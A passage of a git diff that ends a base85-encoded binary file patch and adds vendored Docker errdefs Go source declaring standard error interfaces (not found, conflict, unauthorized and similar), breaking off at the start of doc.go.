zeB|b7w!0&nj2^dcAvLXzd0?UQZ=HJNKWYwiy&d<y|I-#dH7#sok1B+5jf83Ue3wgY
zGb!3k>Y2gc-+!Mij&F6L*nn>*`l15u2mJXHa@ps^gy9mK?FQks;IQq!zf$>nuXQ*w
zB_C!&jUZYZoI@8dZo#2V;I!lV?0oUNIo@5UjcN5AU2<ZPnv5o)ad(aWmhR8Ko~LgS
zIGyelNAf5N<|R2l6kRw;gEfjc6@_=*{#YH2WVg@(x$TGQ55AY6sSJnJm0gP_rX^&a
z3=-SOZ1V^qYeSgq)<gqCdy`f2e~>bN^{GSs#gt^90B2q#Wt!?yKV7}5(ONFB-@Mge
zh<R&8*u%EdIp;lr5L&v>{+;CuIP4+6F3%iD{DN)u*-WmT6KJ&QG)~>MH3|-CjQ6Ux
zJc^7PYF};dC8S-;`&pyiFMlzkx)@aBC1#px1U(AL`fcB`%}XD$*#4eRVO~J5Jo;=Y
zKhdjMsR7yrN&7tw7xTwthZx}=U?hhJn{ca3NGq#Nc|_kh|F?h*8r^S}tUtq%Rs>+&
zoUdxM5@)Fs1;KD=$2)(#mAwfB5$cUL9jT^*ZZn^N!B#Z#lQK<GnEzV)-Y^znzhwl&
zkSJ;D=NDT3R4m)#4C~k*#(@2yjU`w}eX!9J3As7gof7bL{wpmoMo7-^6Sg<%eRIzX
zsN{1<ZL~D504Ka(OuSS>Nx0ei3)IA~QW>loyE&Mm^4T$1G(Y@_;8p+1QIp(A0=s-J
z2Z`yH_vX=xG)jBV4o#algt{`+RdE83AWJoJ3-GtJ>aT~IDEf)GJ2({S3xLSLP9hqF
z!Oi;?g(Gu>^0(-+yD3?CH-jyJm#aa#TF4CfGCxHYuPx+M<6^^TC`u?%961@73&7s^
z-UkD=u)?!km79EPCKVtQbt=uUtxbyyiz1c$m5UTMLX$j_9GY!#SUzXsRKG6A$xmN_
z7CR(6K=6JHvy8xLx?HQBG>g+k{4v+47CWW^BmLP0`|#;LlUz~QEbQx`&JkCNJ$IvS
zYdV-zuM*=;E-mgeWqC7^`UYoRnRb{yMbjfG)`jh6F<qnKxNF<zRlEzE?yy3D>2yMR
zx!U(}G~FZ?8)9BO>8kOw^zc4bl%-%n#_^-6xO|IAy_PgkdNlIq_N@Ep34n4{CG&9}
zdlc4kzv4ke%<GwHyWKe)QUp?@5jhbX);@+k_sbfNO3Y~A3Mx+C;yZ~PZgry*+aEr6
zX354B3o(3N?ld0(JdM_J@1D*}lM;+q^pJ6%&&Q+6&Qb3m9woX~s?F;&p#MiO>`)@D
z1)5YmYuWxUuqOLUg4H5X_N@?wtJNLVSl&_Cx(LoUKm88cUCa)(D;948!^Lpkaj4Y?
z)m;b=SqBDqes~`<P(u3$EfpUx$SLeGjXKqs=J-earqSolLb_8iMBZOiK$Q(D4mM|2
zq&@VuMxAe?3Bwc=#2hs?*0#o^=JDBb&0X99m+#{x-?-hxM_Qzw2G9mOx{AI)EK+KP
z-a(y=VVof9CB%O;i|qHE*~#8TyBlP)n(>O)Bm_hV5`JjDMD#a9C^zO7X%A*0e8gx3
z6l$$f{}X1(Z@HT$LBy7D@{D6U4tt%^Fly7Fg6e>sZU6zB9H0;c78rWG8mcfK#<3`5
zDgNd`0|N6{G(7eBZY%fnW#yep*2ba+elij>xaD@jAh-524&Y=88qD3T-lZRu9*Rk#
zU9)iRv3={60Fg}gevm1ZI{hYbGaV#{ZL8$yGZsq4tX_x_@47ACAw&Wm<?gZ=Z43|$
zdR>LB1nSdi7U0+e*Dm_OgCqY~QZ`s#kC!Od3!dEK@_ugBv}+P;><LhSn@XQtxzp78
zc5L(fvuR>e`AqINU(Qyi-?Yus6?OQ&sc-VeH%gp;*jgxQ?avF(mm#WW^uVl^Kx2qD
z^8oK^oUorcR_wNFAV0tS1qOM0$A!>>OwW!G`1Qws@GEmM118FQ*ZM+%c5-~|LmKoM
zT$Vy3RP#n*Lz(x@SCrWb^_ply`W8nCgQ-3Wknkoil}U~&?;4m2g5Ch|fF7)q*6yc)
zd3%#Slyv{0PN!6y7W?#-S{JYH?wP!P5m#=Z4mfsFIoz0bDS<iv(9HwbD`w;%tBiHH
zV|Rx?Et3~}C)IoGi8p-#v^rf0&pG^u{0*5CcFJ-8q3RSO!652s^*i-!?g3|{&HgkE
z6;#!^iFFfnm%^}^qtdFo^iDTGhkr05AZ-AaT8*(A)f!6v9|k9ly5e=kNQ(6Zg_#G`
z-$}!Sa(<vqw?1pV^F9m|qrcF1CSrz|aolKi6WEuM(-BiCSfEnooK<4|$MOo(Ky)mu
zubhT>CDTYM3NF{2{2gN&ebED2W?lVC$@@bD#R!kj?HNcKBnc4cBK3w+{&z|qRDVi1
zw6ZG_STl8re>EY9sVW(X-z59S;s0@UO%|Q=0)sLEg)#*z$l2|EAHlNhxB3f=BD9A(
z4IZ)sE8t#+^ERS?M{19897zddrX`JD)>4|V`6-LdFJ42eeK70E4&bNTA=-dN`%&Y6
zt7s!|Yqaf{9cVxaLiEzY!5HozrhlO;qH@&w)zRdRr_h>yt&C|GR!d+?Ea9&HZkZM;
z`1m10Q2gNJ%DAiHyQMT3$+@o6i2l!DT!;~ruFn}%`i5%FPU=XQKQI0yu29Ye+)XVq
zNtB5KhjjU%fVn@abmfQ!F6zN!|5Tb-Maa>QT}c8mU63RfE8w7F*+HAJWzBP)*{mIc
zdsiN=Ff%tL;_@o8rJT^~f#RtZ&XEw}NeM({bmx8ft|Hi?jtgIFKo7WLhD@o}8aEMt
zc04Lf8clTAElT~R3yw6DK36h7p5x{9Bo?_tv0<n>dG-4EcOhSw@{*L#24*JL)!!zb
z)6ED{E{8{c^93nijj(+-|Da+(q7i?a#*ScZ_0|u)&+8_a`=eSiDv$NyN-89UxqA%r
z7^EhrD5rjkn`%bmEtW|hNGCf#YY3l#iOazjf(Q?M?)PxoAl0qRRiq0M#-p&F;tQU#
zUIv>WW|&?Dv-QhPR!V!`ZaGNG072OQ`150eUC|Bco$+N6ql~V#x_*@OwUP<^%P@<Z
z`R6?rr7NwaPBRvpl|m}oK<wi-l!GxfL|9B#E(pAJT0g4ec={89Fn1c#aG{HJU>hn3
zB0`T3FL>$|ZM5pb;rB-=Xt1Fmz_(x#3Hh?)J~bJNq<?2<vD@aRA~ipdR_7WHru-fh
z<_Gb#wuF|3!JYolO%NkBQWPoZocSrm`SfOxM0~!&lk2XmI-Eu;eB4b(yq>*N-y!43
z#Uwckx+7%{zC$)Djv#a`!QS1?xrv8E;DI^YEN8sou{I3#%@_r{-qmRRGC0i6JlMt9
z_k`5z^cDF)%0P?ik19@M`U!gvoF#GEk3}&fM{n^ts*bW+Q=u|3$=}h3%*|?4)eAML
z4he*WSc2umn4yTo%sW;rnA64*o`i)5p-Py>xFTcE7$wXUk;>&5qtVCWSI%ewvBUz3
zAWrT0Eks(*ab~F!l+do>g|E>|<mxxeEks$US3=31pbeISxIcR0-|fgf&9+8s!wK9P
z^O4$zZ?T$>R56?Q;9(GW{S5uVN9FgwTPF60)0n92s?X0EC=bSygB(q#PuZVKT4iP;
z(|W3^G}~iB@k2C85JU`1-Hwn`l&{Z7VO7kA3a|Hu@}S1m=B$cssFWCq+3Yl?MZ_6G
zsQ~u+kScJ;Te{rkSTiflF@$Fl5%`qs6f$xCbA?j9A4<^g6mn0Aulc0nSixW$W!!hi
z(x74=mYU^d=ZO4QFlz2B3I0I0eSmkcz(1fFOyJ*g7^A+XeeC?>b<dm{(;#fINUj@L
zXusR1cy~PeT`!X}!5+(ts@LGA1--OM+xb}LjKhw_<s2!!sOx_=Aqn6K8+=g>j!^6K
zYrpk$fJiW=1JPka2B{66#UgER1LC(>YC+R-OKZOg>s<n-pQ5KT_309Z6woyPVSJ-R
z1sCD*zL?LJ5+M<BrGR=h_^jDA`rUIYJtwTD$Nss@4m+)|pop0RfyZ7TtzMnZ54TU^
z78cvy{z%N|H&$}@HYiPneJ)Q+>GJmEKqa+5QfvgV4Ah?B#&gBDQ0B2ijn3SR&E_o{
zjv@x;f^yekAle@(Z`qurA>`em`{QdP&yk@RH~Ec~Ix4-6mbq*WM48F29cM%=0@_gr
ztGC#5w^w_yOcVubkP2wz07i%az?b9|S5DI#R=m5{G=o8n=ghV4Ahf!b%|KpkaB~sg
zlbJyZDn7DW?2C74v+zd*x86BS(8R)I?(aalH1<h+m@IANIB*zfIj?k8y5M{?lc~7u
zv1Do?%&{khm`cs0a!y(v5HGscLid!-|8-BZ9Ua7O1{~7r2>(EI0%^v-%qohb&CR!o
zke{`w1^unpo5Fzg-5}w8=8WUhM@9Q|hXYiVmm1H0O+YnIM-y9pP@z2=FOMZ=*(K(5
zlB<1zy4f$TpJ-XY4b*32<qTH{{SjIlR$By1yGC#m(*IiUGhHd6BGrbl^Jsacp}}HZ
zZmq)yoAC8E>1WS3Zxvy$@MC3A9jpZ6nlRh>JYHz4wr{pmX3Jgh;fM#8KrpG(*?g{%
z*R+iSl*3LFtU20@AgN^NIW6f!n1O$z^_+j`{TXJZOr|?DgnpNIUT?wBY;c)hi*-+v
z=J`5^_-uLnJN@?PcDYGBz+rQ$;_Q6nw*~8N;d;sE50KD8AeBGQ&DNy?0RmbXOnL2b
zZFjghm6L6QPC++QUz;ChX3<yRFFb0wEumN;Z;vIFHDfNtf|E<Igu_KdPtR5ku_NyH
zVzn~RZUV9CwJ9|4n~Z?Akoef5!NRn56nWOV%P%<Wj59rV$15=wFn_f49Z#P?Y!z!9
zooMFj;pp_&5+vhkXyALL#bv(9#BqJBOZ=(P`jMK8h~n%XszN7>O}fSSP&93rP`CTj
z6(-$C1E9tC7Av_*Z@s7wmtlD}=rtXg;Acc?nVNEg{g7bYA9}^rSnm5%c?F-FT#!ch
z<IOsxL2FCdY_jM)#K#<7d(;wh>iA1&Kw|N9g8M{f_Ya%qjniGigbH(uz$KAL`ysF$
z<ZwuCF3nd=D-KS+Z&xQ=_Bfc|bw{aoqhewS1V%qfEF~pHb{xO`AjyRRpM+>LJ94Ex
zH@)IZ1r6>feHxP8M~O7Dp@LUtP|E$56dQk?17-R$=bBrpm{@7#QW#E;ZlECvvZ@7P
zG{~5Te$=EdG<u?|^RHir${nnCSh+Z<rAVT*KbDd`5pksKwmT8(LNXxl6v9L*z@n})
zab$bymUDOKPSO6NQbhDWWHlI%35IA07DS!Q&4FlY8dal=&c}s(A2U1-leRziaqtv-
zBc8H_C<L9vx@qVM98W4pB;Jq+Xt11-{-!ht9W8M!5c=m!jcI&w_Zl1Lf!6vz;$FYj
zW|`pjjT5|DRe$4^-U~%xw#HeCucFQB3H`bC$0SAh1UnFc;nR|K2ReU^;^)UJ)5-^J
zRK?|%mtgw}|K*yjHl~0n0I6K5>ZQ@<Udhpzc3^9r88mW(9Id{hC&<5+FOwY8aXtu-
z8P_Dz3##WzrK+HVJ8dZXw#<thi$=r5zKC+lL83oDT=1~qcnNc)?W_R3h;3HdvTUiy
z+rY$E5cIhIqFe&OmyAMcIxpUP?r{V}%|grWi#m1J8=IeMxqU7fw7N_Qt=cnd?d(W5
zZb8Jia_|)@#sw1XeWhO=o4;yJ=O^4wIILR>@vpRHDc(>rR%AvUp2y|wf7KtAS8A0(
zSos_My4g_YM1LTQ<~nN6P>-6swth3wb}U{qLFIac(X_bWEfH&RBn*@0;YRNVlR|d3
z3B+o*M^)bE%&`QhO<|C}X}9vX(dCHfA{xn3u|W$ngL{f|GV+3mm9~y_p%RKi&A1@!
zq2#TV&`dXQRw<{K%$Px~N0~C0Tb2m(hQDo&h;;+wFP}S3u)Q9ZuHBCuBBg|kTwxv<
z*qYV^T>Mou#N-#ZzcQ-SNll&PJYlukBZ&K<(di?92u6&m_KY^-Q$riPW&qWo=6Fgp
zRZlZ>G{H*h&!H&Nc2jMCL~$GLM-p#$E%c}nV5N=>S3`*P3``SypDhum_d;8%b5sXd
zkf)nbs5yo4vNeK%4lLX26BWxyKAgV+f9s<_KjRs@>KQ9q9)A@$>Tm?Cxtc=|LZyua
z3NDF}`}K`#2CEUMrow1J2FDRzw3-dQNiE+|>*LaDG-vg=vsVu2jhxrwRHxO>c(B$f
zlHxSV#guxTxkRc6jB2ZdLFq51s94g%F5?DbO;!D7E1skkBV!)n`U(p{u^Xjx0t2j8
zrpTOyX~eltKRnw3x<stitWM+;y!LmTfDpJctL^}1;8SfHzi$%tZq$&*B>is|T`Vn(
zQxET+m1;{Ho&lKD1p8{e)~|#cZF<S}(DH@77fZY9+>JgW3ZhM+O;#(el%P5{17I&D
zSP-V=tD5d5q@`&_HViYi0b`sj8juHTpbB|*K;49|L<K}KHEoe=LdO@d&cz6jv+>!w
z-(hBR8*}fIl131^hi_uo2)DNQ-Vo|W4zOO=n5s~t9afv#RDBK<Fz#vr0rK^%NH0~r
ztY`?Iu+G##KHBDG+Khg*B@Bc=W?aVt-bt4}t_Td{e`gf;OopsM18$^V)#53x555wJ
z$8@c|n)+eC*WjU$f{Kv&(TXS2?YNL$Y&1%sL319VU&R+5to^}t4wq_m4natEUK`t6
zpnJrZ0Dl%(PP*LL)r3`LD#TZa=5OaPE@xI7UHLBhe>gcIRzyS?(<`B*YwzMF$*uNw
z*f#cPL7d<Iuu?=@#7@K)7gpMlEK=C}^u%GbsMJb0->S%z8X&!r3u2ytZ`#Xe`u4Ca
zvQmK-cMt!?6KYVAAbARNRd?EQ)OCSLR|jKm2B%N4nyc$s&g)s=1TjIi=zF_c{rb=>
z)Cy`8!Gb)Nf@yx=M^^|oKbkcXl#}T=b=fkVOXl;S6I+DGw}D?5nfk3PJ`wC&zXa`1
z${k`P6Uo0(uuUBjwx@v)dq!`Fx|jj{^F}dDYt=!+X9x6pYBxbmYQMSr=SSET%ILGI
zHpfzq(x4dyRLz1MHHHFK?y}aK>NBC=p{Ftlovpocjmbl~N8SoeyD?qj6TSGI#OjNv
zjKn!vl^SdcoRRlhes!b7>t--J(MRrM)+e`A#%Dnk+0=gUai0NoB@@2qSuaMY)+dzo
zJ$EyV@uOW?%MtPjH>eFxv5M6R3UWYzfK*RnmO_EZALJZ|#~{wVH$oAh52?qrEmc~x
zTLTx6S)qY@I$BvDoBfn%CjsqXwUirUoNf*93bT$koXipP{v-6nDYnFJ708rr6a0PL
z1vsKyh__fyokD|YYe?J;v~)g??nnBCO&Z%^V@ln^c(LlI;D%ibzEWrA$H+fpo<yg~
ztC8M7Sv$~N^d7bkZLp-+Nqb*WXKpakLHUDZhaUDAYes=?_iQs|CvmmbglE)p=^=wt
zJq(QT?RG*lquZFP>1^pYeA3T6$cDrCg=N?uhSPMSgl@N1q^{RjAC48eED}oV+v<-}
zlgxS=A?noHYmRt#6=HD|MqVjef2{3R>v&3u$Aua~UFgC#e6_#tJBc4FbUL4&dte>C
zi7~Ptq#5F?)$o>rItsLMA_E4M$OK$i=LD46u44`uT$Lt_zaX&5a#vBbEIJOPQw!lu
zq-Tq(cmj1pJ>i5<zC{z@RqABE;kUwhd4UEvQW97M>7u(|&rv=~Qmb{44t@7d(n3s#
z9T}^Y&}sWeTEEIr%2VsL<nHSkP2SGbp(mI$x}<mRo#XX|{5<FY$$<uySMdsrcG(6d
zymAqB9=+QAo=q_=Tb^)=E7nv#87e?AxtzUcsSI*B-Bwq=@L|ov3Ts*U9KMo<qo7n$
z`c}L%4=esZ8YBj+5IT^o&|H3}qGM?_rL?PH-n4nl6&FWVcRD&_pSMTTO8dFZ);Y*S
z?7Nj}kRVJaVepjlFzEH<78~pOIBOzsu_%Zm@3wjZ3JRLD`rA6rsONB^bT0+`>wqPd
zOT@lqh16;ifTTZTru!md_NA?1m{DgugQ}pgx9&=?(i+y9Pf|ANoD7r%_IQumX}8V3
zM}7)f36r2%wfQ_|-<LUOGPuc=L_?cQhz1DyqeE;!vZ|<PtJCFe435n$+x70DyIn5k
zn1GGRoXi&<vRXeH1>y8C@}iPUkhncqC&ZS%MYK}DqT<q7s#IrvosXmAGwEenQ2J@Q
zQkX*20BZm=Hpb!-Wh!9#ybpihqqM$<`@&@g7a(Rm%ANP?f{p0tsZ<bF+1uG4AUT;*
z*t&)l;S}H>iMrEpefud%ZnO(I9F6n+H=0h(DZ7=d0-Xm9>8w8q7X(w9!bYuiz*``K
z)KC1KhrmTEXDsKzjO;bzg8D8~F9J3xjP<YWN3e7j(hivX0P8bOFQVxoFl6sIWi1ra
zWgyKl=DJ+{%--+~({~?p&C^Kz0RIZW4locXlWXfwJf73`8)|sPmMXz_7kPiX7Pm^D
zIR~m8<wF=jZT5>i!1M~l9}sam8ihsq9I-_n;p7LpnC|PZum_{w9h{{aSjTT`(OIC*
z>|(wFyI0LC79J{!w>Yq_hEn=0(tg`$XKG70Ht0yiVHDV)$2D&W@Ai+sZ+H8?o3_&W
zLP6LD`M+@d3MHNX%^kp8_inz<@WDdc<CA4tl~y++Q<8sYjuTj>N*S@(@O5ib(|3zN
zQzRy&a%CpB&y0PkpSLZbsME%Cm=m5x-pj|LPEQWNkR3IdSTbZ$l%&=U=X|IgQ!?ZG
znbH)Twr{G~(c)mD%jY^frpFFYBmvY4`&UG)_hB<+U09{iK+6ektQXt(C5m0uHQqPs
zdpm#EEcRUEb&p*x(J%x}VX@f(+n$8t`W&+<H~mOBU?Z*24WrckuCRec?T>%gu^f21
zoj5q{L`UlHUzgU>6R0&U>~v}L>F$&HnQiN9b3tOmWvD-Bz$j5Bfs@omyCJHN%A^H-
z9}Em7?caX^lqSYyBUv1F1h|I^-a+#+!f1R}8)%`q74{FyI}$GC84a7f`N}2yP#Y=$
z`$cN)MA~1oqDW+J_7cj3y+K|Dx0-%eo{xGlp0cB6{*81!)h2CuuVe}*ups>w&Bucn
zA{5SCFeGi9=5Qjn)^LB5<Vn2Skc<ycvBj!#wPmp2s0XA=Vr(?&5k(}p2~6FHe3)i8
zKKf_s@4h{|yP^&tWR#(aAwXsAfocABpN8{xt2K84z77^iWAsz#sx-!Jpb*-snWFWj
zueGg%4`;EXPE8P?ztj(|pMQw?U55GVI64v;U4IQR$BVS9xI5qrfU5sHQxH2`-j14s
z^K1<D9x13}O5x)^EWUa=kaZ;#A-*4cC^Q1z;V~?STalj`l&9gAi-E>+70b1x+Cl&`
zl}5LxJXO+CDPtuBQcz7K#SM(%z%9N}`B+Dxkk&!}trLqz(;S*hkkE1!!U)!aM8uvE
zT*@ix#b2pFh!>{)xt~$B{YTxFLAK#?p9TvYQ437y^DCG-8LXKo(9taLG)3Llh@7g9
z4KSWU@qcPK^Khuz|BpvB6KVz}vJ)c0(;#FgMcD^qE&E`MrI0Df`j9QmV3K{JVeH0I
zvTs8n`;4p&WiKLS`5yhA-@o^Do%^5rT<89r_wwSDTsyzjR#<9$nx_khPAqwXDsjlD
zkB;E=;Uw-w<{uPuZ_ig3)JOWLg*A`&zeqmsBHy`k#s23LM2NAif>MfS1{Oa$rT|IR
zvd{u_6)&bc?1Nu7#~1Iud6?QY_5{R_roK;oyaJo|Y2h4s#sC6x;%@A%)4VN{Th=$7
z9tG_B*tE0#`$bE2%1^Pq+o<N{p!Qm@F(5A*Tp3sVke1_D`<Q=JhoyZnVY!!hKqW{t
z1@D<zmetO#AAm+)FmqKAe55(DvcXPc`_wv5;pa_i{%tN?KP&}0IvQV5ojWE4c(1GJ
zV&!*+y?$BZD!pf#AnDMz;6#oTOU+*Ebs{|2Y_dgHt5~-M#&G6A%=VfQ39o2ocUzR#
z{Lzt$-J$Ye`isbl>|wV7r7G5>xrFmuz`!f%`lC?bnwz!1lIN%c&K$AEBy<aZNHyJI
zG@|Uxlw5H!H|w)PHJv5lL3*84HP6&^7ZjV>!x@zgp_@N#YF>y{-vS)6(UNaV(zXcI
zOQ7%NHj>uLawOWj+B>4`r73Z#8UtAcZmZL5eDZi=RnlQhk{}H=O46~N)bGB=<?`BL
zOR-Ts&==yVfb5;uTCJi5b!{VE$9Me6Ny!g|SZ<tUFlUAh@=)tQXO>6r-lp9Jm;i*T
zQP0LFJ$Jq|b{#r<6j@8Fj`lXuF6%VH1VGGHk?_s(l0EflARt0%N@!6f!@}q=GW;cV
zY|bySMIZtblwL{2%tGPdV%~g{6oubU8Bz>?S)3NCKV!o=Pe~G#&-n8$BxqezqbnZy
z`8@y877SiOn|Sj*VrU-gRcw|JqJ@{K*RUj-&Xgq>Ru$eZ25pVjiFxQ7{26ok-b&w{
zAeXHvFPaqE!6n630n~-JEa=rzk9ZQK!go(9<in?477nmARL)+rV8QXFQXUWI&At)4
z`sjPV36D>D0C|<`4^_hn1n|o3wCkoKDj1JC!vIy)E#FJ--}q%BFZj**!#%pDqFSpI
z5oNYV+V-aly4qIhCEN2pz}UTKDUJTzF}U!%ma#Z0oXE?l=-B%M1{4?J7a2?O7>IzD
z9>t2l%ksXZ{m*VbkRSHV=^MDsG2DOK*<~XP_==ef{df=aYIXYE&(T*b+~06|SfFNo
zLS`bXaz?ENZHy2cyP-<ni;_y0b+*66FN*cbtHL5Tdn$=j<<OXB)VM>d`ZQU7K?y@U
z3rO&(^z1Hu4Mt^Q$ylLhC!pYVrjHtB;fz{_#Bp?+MO165mvxspK^uX;4%oypZT23=
zMX_o>)*zll!>$*~Iw8~spD3Ds#8$~nTHqS%dRv5_)tgZv53DPLoYsD@#cLNoDa+y$
zVos){T>jw0c|zJ@0K_)ahe{q^@8cT!q)4(Z=FaGD6Kwtk{YnkWeaJ48p`IyKWkLD~
zy#dZmv81q{36;|gx5XI`i7?Hq{`x*Y6f|~<{jhANQI9rR9dFk=QDvIHa|b)!jBzIz
zwo;Dk@GR*hj#4&T#2`*t<cq?FvTufy!c-~?;YlGT<toZk`$R^uX+cHD1@zbTCXn>-
zn6gcS&q)BZVo>>HcZNzd_{3<NviuW2L61OXrF6!b@GQEW;(O}UtNp$rDMn%-dx!@|
z_NSGpMarm%;Z=5mh=?ZQCow!Fo(;psE%o*kiJ7Bc2&X$Ad3q9blY4oDd>(n4^@_6;
z%MA{ObQTYxz!!A2oj0rKpbfS^A=Tmu1iQ)VM&=f*=U7n$%jwzAPQK!7jC)B|G8u%g
zitgIG_{L52;2kps8>JBcHCYvk!`Ir2NBN$vE}t#G)w>L}!GN3t98q<cQ3t4Wa}v4o
z0*@UbeDcv<cQeaiH;O3Gx{&SJQ16*ZM>s}}@gjfebVY3F+SKs6s^+LrsnmTs+h{HB
zR-iShZe{E_VAptc-kuRQTXn*mV6=+ee8!A=hSKCFG>#hy=1o*ON!oL`I>d(=T1<@v
zi!h7r$X9xrimdLn2KV!iPyp)#+|;JbW;z^Fi~QL(DIlDM%@#A{u^`jNuNFK&njzv~
zM^5Dp$3620J1}?~A^;@CtI7RyWjc0|DN%xO*<Nar34UCCM7d0MkFYG|Mys49!ikzd
zMPGcIlwPsypdJ)0J{PYp`j0VFX&~^ID@x-XR}n9*a0ew8w8)FDvbb+{T&r;zvoN5H
z8~_u80l3~y)7d0AccAj%4u-2@;%McXOQg$*c}l72LG)o+WZrnXUgEh}+=pzfg6QpC
ze8YUZ@67Ak6yJy;ESGlj^9bAV;lWTfSIZWgUz?@2*u9_GQ*U2ISE@O??^k@UWX!7y
zTJWU266GDpdozy}Ge7la<B_?9S;*^;V+MX1zu&qS?R@Hf4>8wQHJljN2)HNl@E$Og
z1jLBWfh^bbgM2JeNnuUDP$lVRVc~u0)dA48cOZuJl6q90T|+2m?ebvMdpQklv2fW%
z*#usb-I-7<eGX0>DDei+IwKX>srl3kPlM>GiVvlzjh>b3@Te<`MKz!^=j%usvf&B9
zWRe-UI;kI%iTiTcuCJwDV@(%2rRaOvvGEez1(P5AMn%V}d?tD4E{VoP$w|kE7i~!2
zy;K^@p63O4iv3G}1k^BxB0YGXt)ziPCdXO8TQuXznNJfYZQ*`}z=7AmIx%nOb0sF{
zod5Q6EpH?rZ7j6Yq+KU@iGsr#RJTYFCU1CeltiUhHwRyx{axeQeKq|1#rQgCZjUy&
z2`>(3L9&JRqe^vOXgAgv*7?j3KBxu_A>6iizDx!nS;aa2Tu=O<E+mo2m%kU$`j64~
zl?HJAtFTjPkO|hRQb$x{`(xELcFWJc3g1i2h8)iO(7`In%@%s$uI?VfuZM7qPMY+k
zH!f%hb?7-CCPEH+QW(QI(vxijr5aBf3N|D^+Hh^N?kh6bJXj_-!w5k8!$0cG;R=9>
zDa`2iuvl5fjcW?kydc92zTEQWlh>|+E{zt=a)z+`vYxM#**~TP742^1+KguYEO-^P
zptGYu1H>+3zqG%seS=$H_{!c?XP-9KH@fz#6nT8Lw+%6H@*YCLnZA0ajmP?4Eof8;
zJ;ye^YrQRR`>7FikLK`=FLXF|;%zIujmJ6eoMb-iR6isGxR<zN!)WUFgMSst6(lII
zE>+C_-XUF>BQihL1A7%ygE{TwZpOdtcuB(iaK54kw8OuB>WyIXLILxV0{Ak$F#09_
zubm{w=yN4kW;on&8LI&?e~Y`jcJo@e0S6*(_BrA$(hzy{;giG0MhEg*LnnAll}nU%
z)R7|WZC@Kn_shP&JpKMf0LQxzTAGsfF8DOb{%>~MBG65zW3tXkOfe5=`>VlI!O!}S
z{9Pd51BE<vc(|^fBchoy26g_0te#!B4_TZoMlrd`jZ_C<8hyP5=^uFhAtwgMuH-?U
zaTa~-dHg}N`e5>gazLcITt_@JW7aX_2bFnkXOK)n7#O-4yIOY2OLxXKn>-OMLl3dM
zhXMW5BFon1q#Wtz*9jAuF<e}d$&R0l9w2E{9e1JVH3O!zf*QRk(fi`Oj8lWNR?^2A
zi9vwVW8+tn$uUAL5I1tYGL=ab(Qe%YndU$P%YpPd!pNSc&W={jF=mdD$D?SE+LZtK
z7SFGkOv-4&U>8cy*GWw2SjDrKMf(OdKKgUkzW#w8O99J@uPwFPEUB#=aU68Wg&bp(
zaL5H_c_58^QCZmJq53z$eElK{-N0P4R?0#SEznthaFayi<QT`WwwhnIB74JpI)t=y
z4+jC@*j7{Dgi83+hqp$`T(6P&N5u-I{$h!80UXnX!LhBZ<_A$}PZj~v&se9hfOE4n
zx-840P*eRIM828*M6<<c7?k#iqPIG8!L3!U3nHj1X?-tlQ1^IaS|Zbf2&zKiQarjm
z{H3N4aEQ|{UpwS5?{?1sLVY0<qf!Q*YDz2vJli34E*bDsp<mWF|DD~d&~;(>%`WCS
zk{p_rjPL*~1MVnI08c|GHSJLc^dTYWY)qIHDHnCW)ga`Y`IB<%<`)k88vmrB_|Yo*
zHjRKIVfu10;ms-YnV20-mY$RcsZqu?ug^+H<<~I@R%WO3bpH$T#Uay0<W9<QBVW7E
zX>HLdTDR&X|L&a>X2t5^RsV7Sr&0p9YHZ*J%~%joua3^w)i~&YfkH=K>zV%+4uPTZ
z_>AX&vnJqLaO6b>R6~1D&fEKaiuku4%7%8nIEQzkohi#UWg%VY3E%sYh?Ja6c!;oe
z|ALFOJNf@@S0G=d{VI&y^aOBA^9WvJLm`XWj0+V&aJNcoU92*XXq5F;LMlsEcJy@d
z&8QzsoSrr`UP(Y6KE@@b3qzNgYt{~QyK-Dh#)n!9x(k_jAcE?7N*mLs2+P%^fj@j*
z_P0EeFZqd(bFy$!*sc4>Rh9r_LN{jWZ>r{)Dz~WzK;y8%(@!^(0hvpD@0r6pAb3<Q
zmkS`Sav}XJ`&;R<+w?5}2)Fhh5UxF3Y5ytv*`tMu`)vlu!?tU4tPFgTPM5+lRu9OI
zS!r~xkH8IkzCRV<6ZJ33g~d_k;ynN3JI&64!3=A2N+xWMz)2o6?cQ-RB*k^Ey{gmf
zH~4RfiP0ZG-Qk=?4F2Qg0r{WfmB2k2=*i<}{%@J@*%3qg4K{Y{8e$!Q_no+{XQW%E
HeJ}if1jLh+

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/errdefs/defs.go b/vendor/github.com/docker/docker/errdefs/defs.go
new file mode 100644
index 0000000000..e6a2275b2d
--- /dev/null
+++ b/vendor/github.com/docker/docker/errdefs/defs.go
@@ -0,0 +1,74 @@
+package errdefs // import "github.com/docker/docker/errdefs"
+
+// ErrNotFound signals that the requested object doesn't exist
+type ErrNotFound interface {
+	NotFound()
+}
+
+// ErrInvalidParameter signals that the user input is invalid
+type ErrInvalidParameter interface {
+	InvalidParameter()
+}
+
+// ErrConflict signals that some internal state conflicts with the requested action and can't be performed.
+// A change in state should be able to clear this error.
+type ErrConflict interface {
+	Conflict()
+}
+
+// ErrUnauthorized is used to signify that the user is not authorized to perform a specific action
+type ErrUnauthorized interface {
+	Unauthorized()
+}
+
+// ErrUnavailable signals that the requested action/subsystem is not available.
+type ErrUnavailable interface {
+	Unavailable()
+}
+
+// ErrForbidden signals that the requested action cannot be performed under any circumstances.
+// When a ErrForbidden is returned, the caller should never retry the action.
+type ErrForbidden interface {
+	Forbidden()
+}
+
+// ErrSystem signals that some internal error occurred.
+// An example of this would be a failed mount request.
+type ErrSystem interface {
+	System()
+}
+
+// ErrNotModified signals that an action can't be performed because it's already in the desired state
+type ErrNotModified interface {
+	NotModified()
+}
+
+// ErrAlreadyExists is a special case of ErrConflict which signals that the desired object already exists
+type ErrAlreadyExists interface {
+	AlreadyExists()
+}
+
+// ErrNotImplemented signals that the requested action/feature is not implemented on the system as configured.
+type ErrNotImplemented interface {
+	NotImplemented()
+}
+
+// ErrUnknown signals that the kind of error that occurred is not known.
+type ErrUnknown interface {
+	Unknown()
+}
+
+// ErrCancelled signals that the action was cancelled.
+type ErrCancelled interface {
+	Cancelled()
+}
+
+// ErrDeadline signals that the deadline was reached before the action completed.
+type ErrDeadline interface {
+	DeadlineExceeded()
+}
+
+// ErrDataLoss indicates that data was lost or there is data corruption.
+type ErrDataLoss interface {
+	DataLoss()
+}
diff --git a/vendor/github.com/docker/docker/errdefs/doc.go b/vendor/github.com/docker/docker/errdefs/doc.go
new file mode 100644
index 0000000000..c211f174fc
--- /dev/null
+++ b/vendor/github.com/docker/docker/errdefs/doc.go
@@ -0,0 +1,8 @@
